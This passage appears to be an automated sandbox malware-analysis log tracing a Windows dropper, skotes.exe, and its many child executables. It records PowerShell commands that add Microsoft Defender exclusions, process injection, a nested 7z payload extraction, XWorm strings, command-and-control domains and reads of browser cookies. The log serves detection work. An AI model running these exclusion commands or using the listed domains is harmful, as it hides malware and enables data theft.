                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_056F0D84 rdtsc 1_2_056F0D84
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EA652B mov eax, dword ptr fs:[00000030h]1_2_00EA652B
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EAA302 mov eax, dword ptr fs:[00000030h]1_2_00EAA302
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_004AA302 mov eax, dword ptr fs:[00000030h]2_2_004AA302
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_004A652B mov eax, dword ptr fs:[00000030h]2_2_004A652B
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 9_2_004AA302 mov eax, dword ptr fs:[00000030h]9_2_004AA302
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 9_2_004A652B mov eax, dword ptr fs:[00000030h]9_2_004A652B
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe'
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe'
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe'
                    Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 5128 base: 140000000 value: 4D
                    Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 5128 base: 140001000 value: 40
                    Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 5128 base: 1402DD000 value: 58
                    Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 5128 base: 14040B000 value: A4
                    Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 5128 base: 140739000 value: 00
                    Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 5128 base: 14075E000 value: 48
                    Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 5128 base: 14075F000 value: 48
                    Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 5128 base: 140762000 value: 48
                    Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 5128 base: 140764000 value: 00
                    Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 5128 base: 140765000 value: 00
                    Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 5128 base: 11AA010 value: 00
                    Source: 950932ab59.exe, 00000034.00000003.3408815508.0000000005280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: rapeflowwj.lat
                    Source: 950932ab59.exe, 00000034.00000003.3408815508.0000000005280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: crosshuaht.lat
                    Source: 950932ab59.exe, 00000034.00000003.3408815508.0000000005280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: sustainskelet.lat
                    Source: 950932ab59.exe, 00000034.00000003.3408815508.0000000005280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: aspecteirs.lat
                    Source: 950932ab59.exe, 00000034.00000003.3408815508.0000000005280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: energyaffai.lat
                    Source: 950932ab59.exe, 00000034.00000003.3408815508.0000000005280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: necklacebudi.lat
                    Source: 950932ab59.exe, 00000034.00000003.3408815508.0000000005280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: discokeyus.lat
                    Source: 950932ab59.exe, 00000034.00000003.3408815508.0000000005280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: grannyejh.lat
                    Source: 950932ab59.exe, 00000034.00000003.3408815508.0000000005280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: sweepyribs.lat
                    Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeThread register set: target process: 5128
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exe "C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe "C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exe "C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe "C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe "C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe "C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe "C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe'
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'vQeyqr1.exe'
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess created: unknown unknown
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess created: unknown unknown
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess created: unknown unknown
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode 65,10
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextracted
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextracted
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextracted
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextracted
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextracted
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextracted
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextracted
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextracted
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +H "in.exe"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe"
                    Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move App App.cmd & App.cmd
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
                    Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: unknown unknown
                    Source: RzAAR0y.exe, 0000000B.00000002.4675040044.000001AC39270000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
                    Source: RzAAR0y.exe, 0000000B.00000002.4675040044.000001AC39270000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                    Source: 950932ab59.exe, 00000034.00000002.3506198317.0000000000CA3000.00000040.00000001.01000000.00000018.sdmpBinary or memory string: _Program Manager
                    Source: RzAAR0y.exe, 0000000B.00000002.4675040044.000001AC39270000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
                    Source: RzAAR0y.exe, 0000000B.00000002.4675040044.000001AC39270000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@
                    Source: RzAAR0y.exe, 0000000B.00000002.4675040044.000001AC39270000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager2
                    Source: skotes.exe, skotes.exe, 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: 3Program Manager

                    Language, Device and Operating System Detection

                    barindex
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vQeyqr1[1].exe, type: DROPPED
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 9_2_0048DD91 cpuid 9_2_0048DD91
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018902001\ca733a156b.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018902001\ca733a156b.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018903001\08b7ae794c.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018903001\08b7ae794c.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018904001\b93717638f.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018904001\b93717638f.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018905001\92133eb3c2.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018905001\92133eb3c2.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018906001\003.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018906001\003.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018907001\224de4e34e.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018907001\224de4e34e.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018908001\22b355416f.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018908001\22b355416f.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018909001\d44a5c682a.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018909001\d44a5c682a.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018910001\2002c77d6d.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018910001\2002c77d6d.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018911001\36d93f3c0c.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018911001\36d93f3c0c.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
